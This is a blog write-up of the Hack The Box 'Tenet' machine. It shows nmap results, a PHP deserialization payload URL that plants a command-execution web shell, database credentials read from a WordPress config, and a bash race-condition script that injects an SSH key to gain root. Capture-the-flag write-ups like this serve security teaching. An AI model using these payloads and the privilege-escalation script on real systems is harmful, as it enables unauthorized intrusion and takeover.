<!DOCTYPE html><html lang="en" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="(HTB) - Tenet" /><meta name="author" content="eng4ge" /><meta property="og:locale" content="en" /><meta name="description" content="Tenet is medium rated linux box. It’s all about deserialization and exploiting race condition on the system level" /><meta property="og:description" content="Tenet is medium rated linux box. It’s all about deserialization and exploiting race condition on the system level" /><link rel="canonical" href="https://an9k0r.github.io/posts/Tenet/" /><meta property="og:url" content="https://an9k0r.github.io/posts/Tenet/" /><meta property="og:site_name" content="CyberSec-Research.Space" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2022-09-12T11:33:00+02:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="(HTB) - Tenet" /><meta name="twitter:site" content="@cybersec_space" /><meta name="twitter:creator" content="@eng4ge" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"eng4ge"},"description":"Tenet is medium rated linux box. It’s all about deserialization and exploiting race condition on the system level","headline":"(HTB) - Tenet","dateModified":"2022-10-03T05:54:52+02:00","url":"https://an9k0r.github.io/posts/Tenet/","datePublished":"2022-09-12T11:33:00+02:00","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://an9k0r.github.io/posts/Tenet/"},"@context":"https://schema.org"}</script><title>(HTB) - Tenet | CyberSec-Research.Space</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="CyberSec-Research.Space"><meta name="application-name" content="CyberSec-Research.Space"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script> <script type="text/javascript"> class ModeToggle { static get MODE_KEY() { return "mode"; } static get DARK_MODE() { return "dark"; } static get LIGHT_MODE() { return "light"; } static get ID() { return "mode-toggle"; } constructor() { if (this.hasMode) { if (this.isDarkMode) { if (!this.isSysDarkPrefer) { this.setDark(); } } else { if (this.isSysDarkPrefer) { this.setLight(); } } } let self = this; /* always follow the system prefers */ this.sysDarkPrefers.addEventListener("change", () => { if (self.hasMode) { if (self.isDarkMode) { if (!self.isSysDarkPrefer) { self.setDark(); } } else { if (self.isSysDarkPrefer) { self.setLight(); } } self.clearMode(); } self.notify(); }); } /* constructor() */ get sysDarkPrefers() { return window.matchMedia("(prefers-color-scheme: dark)"); } get isSysDarkPrefer() { return this.sysDarkPrefers.matches; } get isDarkMode() { return this.mode === ModeToggle.DARK_MODE; } get isLightMode() { return this.mode === ModeToggle.LIGHT_MODE; } get hasMode() { return this.mode != null; } get mode() { return sessionStorage.getItem(ModeToggle.MODE_KEY); } /* get the current mode on screen */ get modeStatus() { if (this.isDarkMode || (!this.hasMode && this.isSysDarkPrefer)) { return ModeToggle.DARK_MODE; } else { return ModeToggle.LIGHT_MODE; } } setDark() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.DARK_MODE); } setLight() { $('html').attr(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); sessionStorage.setItem(ModeToggle.MODE_KEY, ModeToggle.LIGHT_MODE); } clearMode() { $('html').removeAttr(ModeToggle.MODE_KEY); sessionStorage.removeItem(ModeToggle.MODE_KEY); } /* Notify another plugins that the theme mode has changed */ notify() { window.postMessage({ direction: ModeToggle.ID, message: this.modeStatus }, "*"); } } /* ModeToggle */ const toggle = new ModeToggle(); function flipMode() { if (toggle.hasMode) { if (toggle.isSysDarkPrefer) { if (toggle.isLightMode) { toggle.clearMode(); } else { toggle.setLight(); } } else { if (toggle.isDarkMode) { toggle.clearMode(); } else { toggle.setDark(); } } } else { if (toggle.isSysDarkPrefer) { toggle.setLight(); } else { toggle.setDark(); } } toggle.notify(); } /* flipMode() */ </script><body data-spy="scroll" data-target="#toc" topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/images/logo.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">CyberSec-Research.Space</a></div><div class="site-subtitle font-italic">Information Security Personal Blog</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/blogging/" class="nav-link"> <i class="fa-fw fas fa-book ml-xl-3 mr-xl-3 unloaded"></i> <span>BLOGS AND GUIDES</span> </a><li class="nav-item"> <a href="/hack_the_box/" class="nav-link"> <i class="fa-fw fas fa-bug ml-xl-3 mr-xl-3 unloaded"></i> <span>HACK THE BOX</span> </a><li class="nav-item"> <a href="/blue_team_ctf/" class="nav-link"> <i class="fa-fw fas fa-anchor ml-xl-3 mr-xl-3 unloaded"></i> <span>BLUE TEAM CTFS</span> </a><li class="nav-item"> <a href="/web_application/" class="nav-link"> <i class="fa-fw fas fa-terminal ml-xl-3 mr-xl-3 unloaded"></i> <span>WEB APPLICATION</span> </a><li class="nav-item"> <a href="/binary_exploitation/" class="nav-link"> <i class="fa-fw fas fa-microchip ml-xl-3 mr-xl-3 unloaded"></i> <span>BINARY EXPLOITATION</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <button class="mode-toggle btn" aria-label="Switch Mode"> <i class="fas fa-adjust"></i> </button> <span class="icon-border"></span> <a href="https://github.com/an9k0r" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github"></i> </a> <a href="https://twitter.com/cybersec_space" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['',''].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>(HTB) - Tenet</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <img src="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 694 515'%3E%3C/svg%3E" data-src="/assets/images/f36818c1af1fbd3b5dda319e9fc701b493bd6815634efe1a07e14428efe4cf7f.png" class="preview-img bg" alt="image alternative text" width="694" height="515" data-proofer-ignore><h1 data-toc-skip>(HTB) - Tenet</h1><div class="post-meta text-muted"><div> By <em> <a href="https://github.com/an9k0r">eng4ge</a> </em></div><div class="d-flex"><div> <span> Posted <em class="timeago" date="2022-09-12 11:33:00 +0200" data-toggle="tooltip" data-placement="bottom" title="Mon, Sep 12, 2022, 11:33 AM +0200" >Sep 12, 2022</em> </span> <span> Updated <em class="timeago" date="2022-10-03 05:54:52 +0200 " data-toggle="tooltip" data-placement="bottom" title="Mon, Oct 3, 2022, 5:54 AM +0200" >Oct 3, 2022</em> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="756 words"> <em>4 min</em> read</span></div></div></div><div class="post-content"><p><strong>Tenet is medium rated linux box. It’s all about deserialization and exploiting race condition on the system level</strong></p><h1 id="enumeration">ENUMERATION</h1><h2 id="nmap">NMAP<a href="#nmap" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>Nmap scan report for 10.10.10.223
Host is up (0.036s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><h2 id="webserver">WEBSERVER<a href="#webserver" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p><img data-src="/assets/images/1c90381bade01990e5425171c3eb12cba52b8fbf548277c8874045ec8e2ad70b.png" alt="picture 18" data-proofer-ignore></p><p>We have to add tenet.htb to hosts file! ;)</p><p>Seems like Rest API ist activated.</p><p>(http://tenet.htb/index.php/wp-json/wp/v2/users)</p><p><img data-src="/assets/images/25d88c7291d76902dd9c7040116b0a6fc3f5ad36fc4e54686143be6986a06ca4.png" alt="picture 19" data-proofer-ignore></p><h2 id="word-scraping-with-cewl-to-build-a-wordlist">Word scraping with CEWL to build a wordlist<a href="#word-scraping-with-cewl-to-build-a-wordlist" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p>Let’s scrape the website to find possible passwords (it’s worth a try!)</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>cewl http://tenet.htb -m 6 -w passes.txt
</pre></table></code></div></div><p>… but it didn’t work however there is a hint on the website</p><p><img data-src="/assets/images/ab1ce18ae61ef1059e4aea8c6978f25a624d8a6d6da49991444932449fc17b99.png" alt="picture 20" data-proofer-ignore></p><h2 id="source-code-review">Source Code Review<a href="#source-code-review" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p>File <code class="language-plaintext highlighter-rouge">sator.php</code> can be found on the root of the site, but we cannot read it. If we add <code class="language-plaintext highlighter-rouge">.bak</code>extension however <code class="language-plaintext highlighter-rouge">http://10.10.10.223/sator.php.bak</code>:</p><p><img data-src="/assets/images/a5c3918df4a626a1b76545bec976b7974c56111213c2bdc8d57216ab2fa22df7.png" alt="picture 21" data-proofer-ignore></p><p>In order to successfully exploit the above bug three conditions must be satisfied:</p><ul><li>The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be used to carry out malicious attacks, or to start a “POP chain”.<li>All of the classes used during the attack must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for such classes .<li>The data passed to unserialized comes from a file, so a file with serialized data must be present on the server.</ul><p>Reference: https://notsosecure.com/remote-code-execution-via-php-unserialize/</p><h1 id="exploiation">Exploiation</h1><h2 id="deserialization">Deserialization<a href="#deserialization" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p>So let’s give it a shot:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://10.10.10.223/sator.php?arepo=O:14:"DatabaseExport":2:{s:9:"user_file";s:10:"shell3.txt";s:4:"data";s:4:"test";}
</pre></table></code></div></div><p>File was succesfully written.</p><p><img data-src="/assets/images/10759c486dec0968a4efd079d75f05377f297b7694abbfbfae5e590908869e30.png" alt="picture 22" data-proofer-ignore></p><p>Now let’s write a php file which accepts GET requests and executes system commands:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>http://10.10.10.223/sator.php?arepo=O:14:%22DatabaseExport%22:2:{s:9:%22user_file%22;s:10:%22shell5.php%22;s:4:%22data%22;s:30:%22%3C?php%20system($_GET[%27cmd%27]);%20?%3E%22;}
</pre></table></code></div></div><p>… which has worked: <img data-src="/assets/images/0cfede87f997c4d64f7d3ef6ef7ceb328d1ab0602e855356ddbd651858a42898.png" alt="picture 23" data-proofer-ignore></p><p>We do have command execution:</p><p><img data-src="/assets/images/95dacb1f7a061aa6d0b18d8ef1679d62cdc74c5cc4726ca7cce446edfb4c2012.png" alt="picture 25" data-proofer-ignore></p><p>Let’s get a shell, by encoding simple reverse bash shell:</p><p><img data-src="/assets/images/f5d4405dede3110f9cd113832e6ff3f1f6d8d0351e76ed2b77ff2249beadce8e.png" alt="picture 26" data-proofer-ignore></p><p>Shell has been spawned:</p><p><img data-src="/assets/images/99c695996d12c0a62bd4cb30ced1ee663a6eaaf5d062ff618ff50dccc9c8d895.png" alt="picture 27" data-proofer-ignore></p><h1 id="privilege-escalation">Privilege Escalation</h1><h2 id="enumeration-1">Enumeration<a href="#enumeration-1" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p>While enumerating some credentials were found:</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>www-data@tenet:/var/www/html/wordpress$ cat wp-config.php | grep "DB_USER\|DB_PASSWORD"
&lt;ss$ cat wp-config.php | grep "DB_USER\|DB_PASSWORD"
define( 'DB_USER', 'neil' );
define( 'DB_PASSWORD', 'Opera2112' );
</pre></table></code></div></div><p>This credentials also work for SSH as <code class="language-plaintext highlighter-rouge">neil</code>.</p><h2 id="sudoers">SUDOERS<a href="#sudoers" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p>After logging in with neil user following entry was discovered after running sudo -l</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>neil@tenet:~$ sudo -l
Matching Defaults entries for neil on tenet:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:

User neil may run the following commands on tenet:
    (ALL : ALL) NOPASSWD: /usr/local/bin/enableSSH.sh
</pre></table></code></div></div><p>After checking the <code class="language-plaintext highlighter-rouge">/usr/local/bin/enableSSH.sh</code> script something became clear - we cannot write to the Path of the root, so it is not possible to exploit that so, this were my thoughts:</p><ol><li>there is to much code for such a simple task<li>it could be a rabbit hole.</ol><p>The 1. though led to thinking it could be something like race condition so let’s try that..</p><h2 id="exploiting-a-race-condition">Exploiting a race condition<a href="#exploiting-a-race-condition" class="anchor"><i class="fas fa-hashtag"></i></a></h2></h2><p>Create a new key</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre>Enter file in which to save the key (/home/neil/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:SEkHM+vYF1qsiY4vDjapEXQdQR/JC4g1L/xXTYyV+1E neil@tenet
The key's randomart image is:
+---[RSA 2048]----+
|  ooo+Boo +o.    |
| ...+ooX..oo   E |
| . + o=.=. .. .  |
|. . o* B.. . .   |
|.   o.B.S   . .  |
| ..o  ..     .   |
|o+. .            |
|ooo.             |
|.....            |
+----[SHA256]-----+
</pre></table></code></div></div><p>We can see that everytime another file will be created.</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>neil@tenet:/tmp$ echo $(mktemp -u /tmp/ssh-XXXXXXXX)
/tmp/ssh-FVbr7xIX
neil@tenet:/tmp$ echo $(mktemp -u /tmp/ssh-XXXXXXXX)
/tmp/ssh-CxebKjyk
neil@tenet:/tmp$ echo $(mktemp -u /tmp/ssh-XXXXXXXX)
/tmp/ssh-WPULDJQB
neil@tenet:/tmp$ echo $(mktemp -u /tmp/ssh-XXXXXXXX)
/tmp/ssh-lJEyrgOd
</pre></table></code></div></div><p>Since there is little chance to guess it, let’s exploit that race condition.</p><p>I wrote following script, which spawns 2 threads and it does that 100 times (i had to run the script 2 times )</p><div class="language-plaintext highlighter-rouge"><div class="code-header"> <span label-text="Plaintext"><i class="fas fa-code small"></i></span> <button aria-label="copy" title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>neil@tenet:/tmp/race$ cat race.sh 
#!/bin/bash
for i in {1..100}
do
        sudo /usr/local/bin/enableSSH.sh &amp;
        echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDycGKFZRwjVjHPmg5YoP/VmccRN9wwBqdr/BBX4IxsnmeuHsWplgTMuLWhDzDz5dONNiMNEqK80tnsX1/MT2MxfWG/LGzy9FgNChV9COPJbQpTgWidH771u/IOXJGJKu1neDGl6z90ojR1OXuTAPzhf7sloyxr2k221WMqtguGFrP0JWfr0UZojYLOaEA5bawQ+pJouv9AuqEETX4ZMI/9iyLA41DFMr521waxtALk0R0xxYlomHGC5jby/e5cP9vYURAW3POhTz/L07se2joqkJoHHHj9d6oudhGKSCBJwLpnKPj4+TCdXfd1BhiaLJB/aRmJOjXEsogW8WXvbKSH neil@tenet" | tee /tmp/ssh-* &amp;
done
</pre></table></code></div></div><p>It took lees than 200 iterations to inject the public key into temporary written file. Grep serve just to get rid of output (KSH belongs to the root key and “authorized” belongs to enableSSH.sh output.</p><p><img data-src="/assets/images/b295a7cad8310daf3bfd07446145ab27266897738c0921af959c1a5eeb8ea0a4.png" alt="picture 28" data-proofer-ignore></p><p>… and … root! :)</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a>, <a href='/categories/linux/'>Linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/linux/" class="post-tag no-text-decoration" >Linux</a> <a href="/tags/php/" class="post-tag no-text-decoration" >PHP</a> <a href="/tags/race-condition/" class="post-tag no-text-decoration" >Race Condition</a> <a href="/tags/wordpress/" class="post-tag no-text-decoration" >Wordpress</a> <a href="/tags/deserialization/" class="post-tag no-text-decoration" >Deserialization</a> <a href="/tags/sudo-exploitation/" class="post-tag no-text-decoration" >Sudo Exploitation</a> <a href="/tags/source-code-review/" class="post-tag no-text-decoration" >Source Code Review</a> <a href="/tags/information-disclosure/" class="post-tag no-text-decoration" >Information Disclosure</a> <a href="/tags/misconfiguration/" class="post-tag no-text-decoration" >Misconfiguration</a> <a href="/tags/password-reuse/" class="post-tag no-text-decoration" >Password Reuse</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=(HTB) - Tenet - CyberSec-Research.Space&url=https://an9k0r.github.io/posts/Tenet/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=(HTB) - Tenet - CyberSec-Research.Space&u=https://an9k0r.github.io/posts/Tenet/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=(HTB) - Tenet - CyberSec-Research.Space&url=https://an9k0r.github.io/posts/Tenet/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/insecure_deserialization/">(Portswigger/WebAcademy) - Insecure Deserialization vulnerabilities</a><li><a href="/posts/ssti/">(Portswigger/WebAcademy) - Server-Side Template Injection vulnerabilities</a><li><a href="/posts/stored_XSS/">(Portswigger/WebAcademy) - Stored Cross-Site Scripting (XSS)</a><li><a href="/posts/Blind_SQL_Injection/">Blind SQL Injection</a><li><a href="/posts/OS_Command_Injection/">OS Command Injection</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/notes/">Notes</a> <a class="post-tag" href="/tags/portswigger/">Portswigger</a> <a class="post-tag" href="/tags/web-application/">Web Application</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/clear-text-credentials/">Clear Text Credentials</a> <a class="post-tag" href="/tags/password-reuse/">Password Reuse</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/deserialization/">Deserialization</a> <a class="post-tag" href="/tags/misconfiguration/">Misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">Password Cracking</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="tail-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Bucket/"><div class="card-body"> <em class="timeago small" date="2022-09-15 11:33:00 +0200" >Sep 15, 2022</em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Bucket</h3><div class="text-muted small"><p> Bucket is medium rated linux box, which is mostly about exploiting common bucket miscofigurations. Bucket is based on AWS technology(DynamoDB,S3) ENUMERATION NMAP Let’s start NMAP: 1 2 3 4 5 6 7 ...</p></div></div></a></div><div class="card"> <a href="/posts/Academy/"><div class="card-body"> <em class="timeago small" date="2022-09-22 11:33:00 +0200" >Sep 22, 2022</em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>(HTB) - Academy</h3><div class="text-muted small"><p> Academy is a new product from hack the box and this box gives a preview into it. This box however unlike the real HTB Academy has been made vulnerable ENUMERATION NMAP Let’s start NMAP 1 2 3 4 5 6...</p></div></div></a></div><div class="card"> <a href="/posts/Jewel/"><div class="card-body"> <em class="timeago small" date="2021-01-11 10:33:00 +0100" >Jan 11, 2021</em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Jewel</h3><div class="text-muted small"><p> Jewel is a medium Windows box. It’s main part is Source Code Review. ENUMERATION NMAP Let’s start NMAP: Nmap scan report for 10.10.10.211 Host is up (0.040s latency). Not shown: 997 filtere...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Sharp/" class="btn btn-outline-primary" prompt="Older"><p>Sharp</p></a> <a href="/posts/Time/" class="btn btn-outline-primary" prompt="Newer"><p>(HTB) - Time</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center text-muted"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/cybersec_space">eng4ge</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/notes/">Notes</a> <a class="post-tag" href="/tags/portswigger/">Portswigger</a> <a class="post-tag" href="/tags/web-application/">Web Application</a> <a class="post-tag" href="/tags/linux/">Linux</a> <a class="post-tag" href="/tags/clear-text-credentials/">Clear Text Credentials</a> <a class="post-tag" href="/tags/password-reuse/">Password Reuse</a> <a class="post-tag" href="/tags/windows/">Windows</a> <a class="post-tag" href="/tags/deserialization/">Deserialization</a> <a class="post-tag" href="/tags/misconfiguration/">Misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">Password Cracking</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><script src="https://cdn.jsdelivr.net/npm/mermaid@8/dist/mermaid.min.js"></script> <script> $(function() { function updateMermaid(event) { if (event.source === window && event.data && event.data.direction === ModeToggle.ID) { const mode = event.data.message; if (typeof mermaid === "undefined") { return; } let expectedTheme = (mode === ModeToggle.DARK_MODE? "dark" : "default"); let config = { theme: expectedTheme }; /* Re-render the SVG › <https://github.com/mermaid-js/mermaid/issues/311#issuecomment-332557344> */ $(".mermaid").each(function() { let svgCode = $(this).prev().children().html(); $(this).removeAttr("data-processed"); $(this).html(svgCode); }); mermaid.initialize(config); 